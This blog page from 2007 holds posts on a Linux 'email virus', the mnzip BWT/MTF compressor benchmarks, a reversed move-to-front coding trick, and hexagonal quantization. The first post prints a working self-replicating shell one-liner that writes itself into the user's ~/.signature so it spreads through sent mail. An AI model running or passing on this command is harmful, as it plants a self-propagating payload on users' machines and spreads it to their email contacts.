Lair Of The Multimedia Guru

2007-06-20

Unix email viruses, do they exist?

Seeing all the thousends of email viruses in my spam folder, all probably specific to windows, iam wondering why havnt i seen any for linux. Are linux users too intelligent to copy and past unknown code into their terminal or execute a attached executable?

Its not hard to write a email virus for linux, if you dont belive me see the example below. Note, the code is public domain i dont claim any copyright on it. Standard disclaimer: iam not resposible for the consequences of using this code for anything even less so modificated variants of it. Iam just providing this for scientific purposes! Do not use it for any evil!


echo ' echo echo `echo -e \\\47;cat /tmp/t;echo -e \\\47`\>/tmp/t\;. /tmp/t>>~/.signature'>/tmp/t;. /tmp/t

Filed under: Off Topic — Michael @ 01:31

2007-06-18

mnzip

I always wanted to write my own general purpose compressor, a short while ago i actually did. Its based on the BWT + MTF variant described in yesterdays blog post + snows/ffv1s range coder with a state transition table borrowed from bbb/paq8 source code under GPL is of course available too.

compressed file sizes of the Canterbury Corpus

alice29.txt asyoulik.txt cp.html fields.c grammar.lsp kennedy.xls lcet10.txt plrabn12.txt ptt5 sum xargs.1
bzip2 1.0.3 43202 39569 7624 3039 1283 130280 107706 145577 49759 12909 1762
7zip 4.43 beta 48555 44606 7692 3076 1350 50904 119569 165462 42153 9619 1860
bbb ver. 1 40839 37818 7736 3253 1349 76523 101117 135829 44816 12593 1792
mnzip r32 with plain MTF 42698 39286 7572 2962 1227 19804 105883 143634 50624 12591 1698
mnzip r32 40950 37835 7431 2983 1237 19287 101140 137191 45604 12428 1699

Time needed to compress

alice29.txt asyoulik.txt lcet10.txt plrabn12.txt cp.html fields.c grammar.lsp kennedy.xls ptt5 sum xargs.1
bzip2 1.0.3 0m0.166s 0m0.133s 0m0.533s 0m0.633s 0m0.047s 0m0.037s 0m0.007s 0m1.062s 0m0.151s 0m0.056s 0m0.006s
7zip 4.43 beta 0m0.539s 0m0.417s 0m1.732s 0m2.161s 0m0.070s 0m0.035s 0m0.019s 0m6.048s 0m1.402s 0m0.105s 0m0.022s
bbb ver. 1 0m2.675s 0m2.271s 0m7.455s 0m8.599s 0m0.559s 0m0.344s 0m0.230s 0m17.446s 0m45.407s 0m0.813s 0m0.235s
mnzip r32 0m0.273s 0m0.206s 0m0.951s 0m1.099s 0m0.031s 0m0.012s 0m0.006s 0m3.545s 0m1.173s 0m0.051s 0m0.006s

time needed to decompress

alice29.txt asyoulik.txt lcet10.txt plrabn12.txt cp.html fields.c grammar.lsp kennedy.xls ptt5 sum xargs.1
bzip2 1.0.3 0m0.063s 0m0.049s 0m0.177s 0m0.222s 0m0.007s 0m0.003s 0m0.002s 0m0.210s 0m0.053s 0m0.009s 0m0.003s
7zip 4.43 beta 0m0.033s 0m0.027s 0m0.066s 0m0.085s 0m0.009s 0m0.011s 0m0.007s 0m0.099s 0m0.043s 0m0.016s 0m0.006s
bbb ver. 1 0m2.265s 0m1.918s 0m6.015s 0m6.916s 0m0.511s 0m0.332s 0m0.231s 0m13.492s 0m6.660s 0m0.715s 0m0.237s
mnzip r32 0m0.073s 0m0.061s 0m0.215s 0m0.261s 0m0.010s 0m0.005s 0m0.003s 0m0.441s 0m0.155s 0m0.017s 0m0.002s

Options used where -9 for bzip2, -mx=9 for 7zip, f for bbb to use fast but memory hungry mode (this doesnt affect compression rate for bbb). The benchmark score are just single run based no proper mean so dont take them too serious, and i hope ive not messed up the file order ;)

Patches are welcome!

Filed under: Entropy Coding — Michael @ 01:20

2007-06-16

Move to front coder/transform

First a little explanation about what a move to front coder is. Its a revesible transform which remaps symbols to an index into a table which initially contains (0,1,2,3,…) and every time a symbol is used its moved to the front of the table.

example: input: “to be or not to be” initial table: (abcdefghijklmnopqrstuvwxyz), for the first ‘t’ we output 19 as its the 19th entry in the table and move it to the front to build the new table (tabcdefghijklmnopqrsuvwxyz) the complete list of steps looks like:

abcdefghijklmnopqrstuvwxyz  19(t)
tabcdefghijklmnopqrsuvwxyz  15(o)
otabcdefghijklmnpqrsuvwxyz  27( )
 otabcdefghijklmnpqrsuvwxyz 4(b)
b otacdefghijklmnpqrsuvwxyz 7(e)
eb otacdfghijklmnpqrsuvwxyz 2( )
 ebotacdfghijklmnpqrsuvwxyz 3(o)
o ebtacdfghijklmnpqrsuvwxyz 19(r)
ro ebtacdfghijklmnpqsuvwxyz 2( )
 roebtacdfghijklmnpqsuvwxyz 17(n)
n roebtacdfghijklmpqsuvwxyz 3(o)
on rebtacdfghijklmpqsuvwxyz 6(t)
ton rebacdfghijklmpqsuvwxyz 3( )
 tonrebacdfghijklmpqsuvwxyz 1(t)
t onrebacdfghijklmpqsuvwxyz 2(o)
ot nrebacdfghijklmpqsuvwxyz 2( )
ot nrebacdfghijklmpqsuvwxyz 6(b)
bot nreacdfghijklmpqsuvwxyz 6(e)

As you can see the mtf transform will generally favor small numbers on “non random” data, on its own its not too usefull for compression but together with the BWT and a simple order 0 entropy coder its a pretty good general purpose compressor.

Now to the actual reason why i am writing this blog entry, can you use the symbol which the index represents as context for the entropy coder coding the index? You say no because thats like knowing the index together with the table.

Well if you think so, you are wrong, the trick is not to know the table :)

First to compress our data we run an mtf transform over it, we store the mtf table after the whole transform (this is not strictly needed but simplifies things). Next we encode the indexes from the end to the begin each time moving the zero entry of our table to the point pointed to by the index, each time we do know the symbol before the index and so can use it as context. This really is nothing else as the MTF coder in reverse.

An example, we start with the table (ebot nracdfghijklmpqsuvwxyz), the first symbol is ‘e’ the corresponding index is 6 (we know this from the forward MTF pass), so we store 6 with context ‘e’ and move e to the 6th place to find the table (bot nreacdfghijklmpqsuvwxyz), the next steps are all just the same than the MTF example above just in reverse.

Decompression is pretty much the same, read the table (again this isnt needed but its simpler as it avoids a 2nd pass over the data) then take the value from position 0 of the table and use it as context to decode the next index, after that use the index to move the entry from position 0 to its new position and repeat until you are out of input data.

Filed under: Entropy Coding — Michael @ 23:09

2007-06-07

Quantization of a bunch of scalar variables

You have a few uniformly distributed independant scalar variables, how do you optimally quantize them? Simply each independantly by uniform scalar quantization, wrong this is likely to the surprise of the reader not optimal.

One way to see the suboptimality is to look at what independantly uniform scalar quantization does if we have 2 variables, it splits the plane in squares and represents all points within a square by its center. How can we do better? just split the plane in hexagons, both worst case and average quantization error decreases. The worst case for the square is 2^0.5/2=~0.7071, the worst case for the hexagon is 12^0.25/3=~0.6204

Another way to see the suboptimality is to look at the worst case point, which in case of the square lies equidistant to the centers of 4 squares but with a hexagon it just lies equidistant to 3 centers of 3 hexagons. So there are just 3 redundant ways to quantize it instead of 4

If we consider the (uniform scaler) quantization of the first variable of 2 then we can simply improve the worst case which lies exactly between 2 values of the first variable by making use of the useless least significant bit. More exactly add half a quantization step to the second variable if the first was quantized to an odd value, this interrestingly turns out to be equivalent to using hexagons for quantization, though the hexagons are a little squished here compared to the optimal case with regular hexagons

Ive also written a little test program in case anyone wants to play with this quantization stuff

Filed under: Uncategorized — Michael @ 02:28

Powered by WordPress